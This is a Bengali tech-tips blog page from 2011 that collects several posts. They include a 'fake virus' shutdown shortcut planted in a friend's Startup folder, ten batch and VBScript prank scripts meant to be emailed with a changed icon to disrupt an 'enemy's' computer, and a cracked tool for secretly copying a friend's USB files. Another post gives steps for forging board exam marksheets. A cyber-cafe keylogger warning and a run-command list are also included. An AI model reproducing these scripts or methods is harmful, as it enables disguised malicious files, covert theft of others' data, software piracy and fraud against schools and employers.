p

Saturday, 3 December 2011

নকল ভাইরাস তৈরী করে আপনার বন্ধুর কম্পিউটার অচল করে দিন (প্রমাণ সহ)

সর্তকতা:

এই কোডটি দিয়ে কেউ ক্ষতিগ্রস্ত হলে আমি দায়ি থাকবো না। দয়া করে এই কোডটির কেউ অপব্যবহার করবেন না।

কোডটির বৈশিষ্ট্য:

এই কোডটি চালু করলে কম্পিউটার একটি নির্দিষ্ট সেকেন্ড এর পরে অটোমেটিক শার্টডাউন হবে।

নকল ভাইরাস তৈরীর ধাপ সমূহ:

১. আপনার কমি্পউটারের ডেস্কটপ এ রাইট ক্লীক করুন।


২. এখন New থেকে Shortcut নির্বাচন করে ক্লীক করুন।

৩. ফলে একটি ডায়ালগ বক্স আসবে।


৪. সেখানে নিচের কোডটি কপি করে পেষ্ট করে দিন।

shutdown -s -t 20 -c "Your computer has been infected it will now restart."

৫. Next বাটনে ক্লীক করুন।


৬. শর্টকাট নেম এ দেখবেন shutdown লেখা আছে। (আপনি shutdown এর বদলে অন্য নামও ব্যবহার করতে পারবেন)
৭. Finish বাটনে ক্লীক করে কাজ শেষ করুন।

এবার আসুন কোডটি সম্পর্কে বিস্তারিত জানার চেষ্টা করি:

যদি আপনারা কোডটি একটু ভালভাবে দেখার চেষ্টা করেন তাহলে আপনারা কোডটির মধ্যে তিনটি মেইন কোড দেখতে পাবেন। যারা কম্পিউটার শার্টডাউন করতে আপনার সহায়তা করবে। কোড তিনটি হলো:

১. shutdown -s

২. -t 20

৩. -c

অথবা


বিবরণ:
১. shutdown -s দ্বারা বুঝায় শার্টডাউন বা shutdown।
২. -t 20 দ্বারা বুঝায় যে কম্পিউটার কত সেকেন্ড পরে অটোমেটিক বন্ধ হবে বা countdown timer until computer turns off।
৩. -c দ্বারা বুঝায় যে ("") ঘরের মধ্যে লেখাগুলো হলো কমেন্টস বা comment wich is then followed by "" wich is what the comment is।

যদি আপনি উপরে উল্লেখিত নিয়ম এ নকল ভাইরাস তৈরী করতে বিরক্ত বোধ করেন তাহলে নকল ভাইরাসটি আপনার কম্পিউটারে ডাউনলোড করে নিন। সাইজ মাত্র ৭০ কিলোবাইট।


এবার আসুন শিখে নেই কীভাবে এই কোডটি ব্যবহার করতে হবে:

আপনি এটি কোড দুইটি দুইভাবে ব্যবহার করতে পারবেন।
১. সরাসরি চালু করে।
২. স্টার্টআপ ফোল্ডারে পেষ্ট করে।

বিবরণ:
১. যদি আপনি সরাসরি চালু করেন তাহলে কিছুক্ষন পরে কম্পিউটার অটোমেটিক বন্ধ হয়ে যাবে। এতে আপনার কোন ক্ষতি হবে না।
২. স্টার্টআপ ফোল্ডারে কপি করে দিলে কম্পিউটার চালু হবে ঠিকই কিন্তু কম্পিউটার ২০ সেকেন্ড পরে অটোমেটিক বন্ধ হয়ে যাবে। [বি:দ্র: এই কৌশলটি দিয়ে আপনি ক্ষতি গ্রস্ত হতে পারেন।]

এতক্ষন ধরে শুধু বকবক করলাম। আপনারা হয়ত ভাবছেন সবই ঠিক আছে কিন্তু প্রমান কোথায়?

প্রমাণ:

গতকাল আমি আমার একটি বন্ধুর বাড়িতে যাই। বন্ধুর নাম হলো সেতু। গিয়ে তার কম্পিউটারে বসি। এবং উপরে উল্লেখিত কোডটি ব্যবহার করে তার কম্পিউটার এ একটি নকল ভাইরাস তৈরী করি। তার পর এ নকল ভাইরাসটি পেষ্ট করে দেই স্টার্টআপ ফোল্ডারে। তার পর তার কাছ থেকে কিছু গেমস এবং সফটওয়্যার সংগ্রহ করে বাসায় ফিরে আসি। আজ সকালে সে আমার বাসায় আসে এবং বলে যে তার কম্পিউটারে ভাইরাস ঢুকেছে। এবং সে আমার কাছে সাহায্য চায় এই বলে: আব্দুর রহিম আমার কম্পিউটারে ভাইরাস ঢুকেছে। ফলে কম্পিউটার ৫ থেকে ৬ মিনিট পরে অটোমেটিক বন্ধ হয়ে যাচ্ছে। যদি তুমি আমার কম্পিউটারটা ভালো করার চেষ্টা করো তাহলে খুবই ভাল হতো। আমি তাকে বললাম ঠিক আছে চলো দেখি তোমার কম্পিউটারে কী হয়েছে। আমি তার কম্পিউটার এ বসে শুধু স্টার্টআপ ফোল্ডার থেকে ফেক ভাইরাস নামের শর্টকাটটি ডিলিট করে দিলাম এবং কম্পিউটার রিস্টার্ট দিলাম। তার পরে তার কম্পিউটার ভালো হয়ে গেল। তার বাসা থেকে বের হয়ে তাকে সব ঘটনা খুলে বললাম। আমার কথা শুনে হাসতে হাসতে তার পেট ফুলে গিয়েছিলো।

আমি আবারো অনুরোধ করছি দয়া করে কেউ এই টিউনটির অপব্যবহার করবেন না। আমি এটি আপনাদের সাথে শেয়ার করলাম শুধু মাত্র আপনাদের কাছে আমার এই ছোট ট্রিকসটি পৌছিয়ে দেওয়ার জন্য। ভাল লাগলে বা কোন মন্তব্য থাকলে বা কোন ভুল ত্রুটি থাকলে কমেন্টস করতে আলসেমি করবেন না যেন।

::::::মেইল পাঠিয়ে অচল(হ্যাক)করে দিন আপনার শত্রুর কম্পিউটার (১০০% পরিক্ষিত)::::::

আমি ১০টি টিপস দিলাম । এক একটি টিপস কম্পিউটারের এক এক ধরনে ক্ষতি করবে । টিপসগুলো নোটপ্যাডে আলাদা আলাদা ভাবে কপি-পেষ্ট করে সেভ করবেন ।মেইল করে অন্যকে পাঠিয়ে দিবেন ।
--- --- --- --- --- --- --- --- ---
1) Convey your friend a lil' message and shut down his / her computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
Save it as "Anything.BAT" in All Files and send it.
2) Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.
6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
8. Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
আবারও বলি ভুলেও এ কাজটি করবেন না । তবে সেভ করে রেখে দিন, কাজে লাগতেও পারে ।
বি:দ্র: আপনার মেইলে কেউ নোটপ্যাড পাঠালে কখনও খুলবেন না ।

আর নয় মোস্তফা জাব্বারের বিরক্তিকর ছবি। বিজয়কে হ্যাক করুন সহজেই।

আসসালামু আলাইকুম। বিজয় এবং মোস্তফা জাব্বারকে নিয়ে এতকিছু হবার পরেও আমরা অনেকেই এখনো বিজয় ব্যবহার  করি। কিন্তু একটি একঘেয়ে ব্যাপার হচ্ছে যতবার কম্পিউটার চালু করি বারবার আমাদেরকে মোস্তফা জাব্বারের মোবারক চেহারা হজম করতে হয়। আপনারা এটি থেকে যদি নিস্তার চান তবে বিজয়কে হ্যাক করুন। এটা করতে চাইলে প্রথমেই www.users.on.net/johnson/resourcehacker থেকে Resource Hacker সফটওয়ারটি ডাউনলোড করুন। এবার চিত্রে যেভাবে দেখিয়েছি সেভাবে C:\Program Files\Ananda Computers\Bijoy Classic 2006\Bijoy.exe (আমি বিজয় ২০০৬ ব্যবহার করি অন্যগুলোতেও কাজ হবে) ওপেন করে  Bitmap/133/1033 এ যান। পাশেই দেখতে পাবেন বিজয় স্কীন।
New
এবার উপরে Action এ ক্লিক করে Replace Bitmap এ ক্লিক করলে নতুন একটি উইন্ডো পাবেন। আশা করি এবার নিজেই পারবেন আমাকে আর বলে দিতে হবেনা। এখন আপনি চাইলে বিজয়ের সবকিছু পাল্টে দিতে পারেন। এই সফটওয়ারটি দিয়ে এধরনের আরোও অনেক কাজ করা যায়।

গোপনে পেনড্রাইভ থেকে অটো সব ডেটা কপি হয়ে থাকবে আপনার কম্পিউটারে !!

পেনড্রাইভ এখন অতিপরিচিত একটা বস্তু। উপকারের পাশাপাশি অপকারও কম করে না এই পেনড্রাইভ। আমার এই টিউন ঠিক উপকারি নাকি অপকারি বুঝতে পারছি না। :P তবে এটুকু বলতে পারি কারও কারও জন্য হয়তো অনেক উপকারি। ;) তাহলে এবার কাজের কথায় আসা যাক।
ধরেন আপনার এক বন্ধু তার পেনড্রাইভের নির্দিষ্ট কোন ফাইল আপনাকে দিতে চাচ্ছে না কিন্তু আপনার তা খুবই দরকার তখন কি করবেন? ;) অথবা নির্দিষ্ট ফাইল হাইড করে রাখছে আর আপনি সেটা নিরবে কাছে পেতে চান তাহলে কি করবেন? :P হ্যা তখন উত্তর হবে একটাই আর সেটা হলো Automatically Copy USB Files Everytime নামের সফটওয়্যার ব্যবহার করা। :D

এক নজরে এর ফিচারগুলোঃ

  • প্রত্যেকবার পেনড্রাইভ ঢুকানোর পর অটো সব কপি হয়ে থাকবে নির্দিষ্ট ফোল্ডারে।
  • ঐ ফোল্ডার পাসওয়ার্ড প্রোটেকটেড করে রাখতে পারবেন।
  • ইচ্ছা করলে সব মনিটরিং করে রাখতে পারবেন।
  • আর সব চেয়ে বড় কথা এসব কিছুই হবে অগোচরে! :D

ডাউনলোডঃ

Automatically Copy USB Files Everytime It Is Connected Software v7.0 সাইজ মাত্র ২ মেগাবাইট।
ইন্সটল করার পর সাথে দেয়া crack ফাইলটি "C:\Program Files\Automatically Copy USB Files Everytime It Is Connected Software\Automatically Copy USB Files Everytime It Is Connected Software.exe" নামক ফোল্ডারে কপি পেস্ট করে ফুল ভার্শন করে নিন।

সাবধান ! সাবধান !! সাইবার ক্যাফেতে আপনার অজান্তে হ্যাক হচ্ছে আপনার তথ্য !! [ সবাই পড়ুন ]

আপনি Cyber Cafe তে অথবা অন্য কোথাও CPU এর পেছনে কী-বোর্ড এর সাথে (PS2/USB) কোন Converter দেখতে পান, দয়া করে Personal কাজে সেই PC ব্যাবহার করবেন না। এটি এক ধরনের শক্তিশালী Hardware Key-logger যা Keyboard এ Input করা সকল তথ্য জমা করে রাখে এবং যা Online Privacy এর জন্য বিশাল হুমকির কারন হতে পারে। হ্যাক হয়ে যেতে পারে গুরুত্বপূর্ণ Account (E-mail/Credit Card/etc). একটু সাবধানতাই বড় কোন হয়রানি থেকে বাঁচাতে পারে।

  • => টাকা পয়সা সংক্রান্ত লেনদেন সাইবার ক্যাফেতে করবেন না।
  • => একাধিক মেইল এড্রেস ব্যবহার করুন। কম গুরুত্বপূর্ণ মেইল এড্রেস সব জায়গায় ইউজ করুন।
  • => যার তার পিসিতে পাসওয়ার্ড লেখা থেকে বিরত থাকুন।
  • => মেইল থেকে পাওয়া ফাইল/ক্রেক/কিজেন এগুলো ভালমতো চেক না করে রান করবেন না।

এবার নিজেই বানান জেডিসি, জেএসসি, এসএসসি, এইচএসসি, মাস্টার ডিগ্রির হ্যাকড‌‍ অনলাইন মার্কশিট এবং সার্টিফিকেট।

প্রথমেই চলে যান নিচের লিঙ্কে,
http://www.educationboardresults.gov.bd/

১. উপরের পেজটি আসবে।

২. এবার পেজ এর যে কোন স্থানে রাইট ক্লিক করুন, এবং "View Page source" ক্লিক করুন।

৩. পুরো লেখাটি কপি করুন।

৪. একটা নোট প্যাড খুলে তাতে লেখা গুলো পেস্ট করুন। এবং ".html" এক্সটেনশন দিয়ে সেভ করুন।

৫. এবার কাংখিত রোল নাম্বার লিখে মার্কশিট টি বের করুন।

৬. এবারও পেজ এর যে কোন স্থানে রাইট ক্লিক করুন, এবং "View Page source" ক্লিক করুন।

৭. আগের পদ্ধতি ফলো করুন এবং নতুন ডকুমেন্ট টিকে "result.php" নামে সেভ করুন।

৮. এবার খেয়াল করুন, আমরা উপরের মার্কশিট টির ডাটা গুলো চেঞ্জ করবো।

৯. প্রথমেই "result.php" ফাইলটি নোটপ্যাডের মাধ্যমে ওপেন করুন।

১০. "Ctrl+F" ক্লিক করুন। অরিজিনাল জিপিএ লিখে "ফাইন্ড নেক্সট" ক্লিক করুন।

১১. আপনার অরিজিনাল জিপিএ মুছে আপনার কাংখিত জিপিএ টাইপ করে সেভ করুন। (হেঃ হেঃ আমি ফাইভ মাইরা দিলাম)

এই গেলো টোটাল গ্রেড পয়েন্ট চেঞ্জিং, এবার করতে হবে সাবজেক্ট ওয়াইস গ্রেড চেঞ্জিং।



১২. এবার সেম প্রসেসে অরিজিনাল গ্রেড গুলো ফাইন্ড করুন।


১৩. বাংলায় ছিলো মাইনাচ, বানিয়ে দিন প্লাচ। :D :D :D :D

আগে.........................
পরে.....................................................................
১৪. এবার সব সাবজেক্ট এর জিপিএ, মোট গ্রেড পয়েন্ট এর হিসাব অনুযায়ী চেঞ্জ করুন। হিসাব ছাড়া চেঞ্জ করলে ধরা খাবার একটা চান্স থাকে। ;) ;)
১৫. ফাইল সেভ করে বের হয়ে আসুন। এডিটকৃত দুটি ফাইলকে একসাথে একটি ফোল্ডারে রাখুন। হয়ে গেলো আপনার নকল মার্কশিট।

run command এর ব্যবহার

কোন প্রোগ্রামকে সহজে চালু করতে রানে (Start+R চেপে) গিয়ে উক্ত প্রোগ্রামের সংক্ষিপ্ত রূপ লিখে ওকে করলেই সেই প্রোগাম চালু হয়। যদিও বেশিরভাগ প্রোগ্রামই সরাসরি চালু করা যায়। নিচে দরকারি বেশ কিছু রান কামন্ডের (উইন্ডোজ এক্সপি) সংক্ষিপ্ত সংকেত দেওয়া হলো।
  • একসেসিবিলিটি কন্ট্রোলস – access.cpl
  • একসেসিবিলিটি উইজার্ড – accwiz
  • এড হার্ডওয়্যার উইজার্ড – hdwwiz.cpl
  • এড/রিমুভ প্রোগ্রামস – appwiz.cpl
  • এডমিনিষ্ট্রিটিভ টুলস – control admintools
  • অটোমেটিকস আপডেট – wuaucpl.cpl
  • ব্লু-টুথ ফাইল ট্রান্সেফার উইজার্ড – fsquirt
  • ক্যালকুলেটর – calc
  • সার্টিফিকেটস – certmgr.msc
  • ক্যারেকটার ম্যাপ – charmap
  • চেক ডিক্স (ডস) – chkdsk
  • ক্লিপবোর্ড ভিউয়ার – clipbrd
  • কমান্ড প্রোম্পট – cmd
  • কম্পোনেন্ট সার্ভিস – dcomcnfg
  • কম্পিউটার ম্যানেজমেন্ট – compmgmt.msc
  • কন্ট্রোল প্যানেল – control
  • ইউজার একাউন্টস – control userpasswords2
  • ডেট এন্ড টাইমস – timedate.cpl
  • ডি.ডি.ই শেয়ার্স – ddeshare
  • ডিভাইস ম্যানেজার – devmgmt.msc
  • ডাইরেক্ট এক্স – dxdiag
  • ডিক্স ক্লিনআপ – cleanmgr
  • ডিক্স ডিফ্রাগমেন্ট – dfrg.msc
  • ডিক্স ম্যানেজমেন্ট – diskmgmt.msc
  • ডিক্স পার্টিশন ম্যানেজার – diskpart
  • ডিসপ্লে প্রোপার্টিস – control desktop
  • ডিসপ্লে প্রোপার্টিস – desk.cpl
  • ড: ওয়াটসন ফর উইন্ডোজ – drwtsn32
  • ড্রাইভার ভেরিফায়ার ম্যানেজার – verifier
  • ইভেন্ট ভিউয়ার-eventvwr.msc
  • ফাইল এন্ড সেটিংস ট্রান্সেফার টুল – migwiz
  • ফাইল সিগ্নেচার ভেরিফিকেশন টুল – sigverif
  • ফাইন্ড ফার্ষ্ট findfast.cpl
  • ফোল্ডার প্রোপার্টিস – control folders
  • ফন্টস – control fonts
  • ফন্টস ফোল্ডার – fonts
  • গেম কন্ট্রোলারস – joy.cpl
  • গ্রুপ পলিসি এডিটর – gpedit.msc
  • হেল্প এন্ড সাপোর্ট – helpctr
  • হাইপারটার্মিনাল – hypertrm
  • আই.এক্সপ্রেস উইজার্ড – iexpress
  • ইনডেক্সসিং সার্ভিস – ciadv.msc
  • ইন্টারনেট কানেক্‌শন উইজার্ড – icwconn1
  • ইন্টারনেট এক্সপ্লোরার – iexplore
  • ইন্টারনেট প্রোপার্টিস – inetcpl.cpl
  • কীবোর্ড প্রোপার্টিস – control keyboard
  • লোকাল সিকিউরিটি সেটিংস – secpol.msc
  • লোকাল ইউজারস এন্ড গ্রুপস – lusrmgr.msc
  • উইন্ডোজ লগঅফ – logoff
  • মাইক্রোসফট চ্যাট – winchat
  • মাইক্রোসফট মুভি মেকার – moviemk
  • এমএস পেইন্ট – mspaint
  • মাইক্রোসফট সিনক্রোনাইজেশন টুল – mobsync
  • মাউস প্রোপার্টিস -control mouse
  • মাউস প্রোপার্টিস – main.cpl
  • নেট মিটিং – conf
  • নেটওয়ার্ক কানেকশনস – control netconnections
  • নেটওয়ার্ক কানেকশনস – ncpa.cpl
  • নেটওয়ার্ক সেটআপ উইজার্ড – netsetup.cpl
  • নোটপ্যাড – notepad
  • অবজেক্ট পেজ মেকার – packager
  • ওডিবিসি ডাটা সোর্স এডমিনিস্ট্রেটর – odbccp32.cpl
  • অন স্ক্রিন কীবোর্ড – osk
  • আউটলুক এক্সপ্রেস – msimn
  • এমএস পেইন্ট – pbrush
  • পাসওয়ার্ড প্রোপার্টিস – password.cpl
  • পারফরমেন্স মনিটর – perfmon.msc
  • পারফরমেন্স মনিটর – perfmon
  • ফোন এন্ড মডেম অপশনস – telephon.cpl
  • ফোন ডায়ালার – dialer
  • পাওয়ার কনফিগারেশন – powercfg.cpl
  • প্রিন্টারস এন্ড ফ্যাক্স – control printers
  • প্রিন্টারস ফোল্ডার – printers
  • রিজিউনাল সেটিংস – intl.cpl
  • রেজিষ্ট্রি এডিটর – regedit
  • রেজিষ্ট্রি এডিটর – regedit32
  • রিমোট একসেস ফোনবুক – rasphone
  • রিমোট ডেক্সটপ – mstsc
  • রিমুভাল স্টোরেজ – ntmsmgr.msc
  • রিমুভাল স্টোরেজ অপারেটর রিকোয়েষ্ট – ntmsoprq.msc
  • রেজাল্টেন্ট সেট অপ পলিসি – rsop.msc
  • স্ক্যানার এন্ড ক্যামেরা – sticpl.cpl
  • শিডিউল টাস্ক – control schedtasks
  • সিকিউরিটি সেন্টার – wscui.cpl
  • সার্ভিসেস – services.msc
  • শেয়ার্ড ফোল্ডার – fsmgmt.msc
  • উইন্ডোজ শার্ট ডাউন করা – shutdown
  • সাউন্ডস এন্ড অডিও – mmsys.cpl
  • সিস্টেম কনফিগারেশন এডিটর – sysedit
  • সিস্টেম কনফিগারেশন ইউটিলিটি – msconfig
  • সিস্টেম ইনফোমেশন – msinfo32
  • সিস্টেম প্রোপার্টিস – sysdm.cpl
  • টাস্ক ম্যানেজার – taskmgr
  • টিসিপি টেষ্টার – tcptest
  • টেলনেট ক্লাইন্ট – telnet
  • ইউজার একাউন্ট ম্যানেজার – nusrmgr.cpl
  • ইউটিলিটি ম্যানেজার – utilman
  • উইন্ডোজ এড্রেস বুক – wab
  • উইন্ডোজ এড্রেস বুক ইমপোর্ট ইউটিলিটি – wabmig
  • উইন্ডোজ এক্সপ্লোরার – explorer
  • উইন্ডোজ ফায়ারওয়াল – firewall.cpl
  • উইন্ডোজ ম্যাগনিফায়ার – magnify
  • উইন্ডোজ ম্যানেজমেন্ট – wmimgmt.msc
  • উইন্ডোজ মিডিয়া প্লেয়ার – wmplayer
  • উইন্ডোজ ম্যাসেঞ্জার – msmsgs
  • উইন্ডোজ সিস্টেম সিকিউরিটি টুলস – syskey
  • আপডেট লাঞ্চ – wupdmgr
  • উইন্ডোজ ভার্সন – winver
  • উইন্ডোজ এক্সপি টুর – tourstart
  • ওয়ার্ড প্যাড – write
*
U
O
Y
W
A
S
U
K
N
I
R
.
S
.
M
.
D
*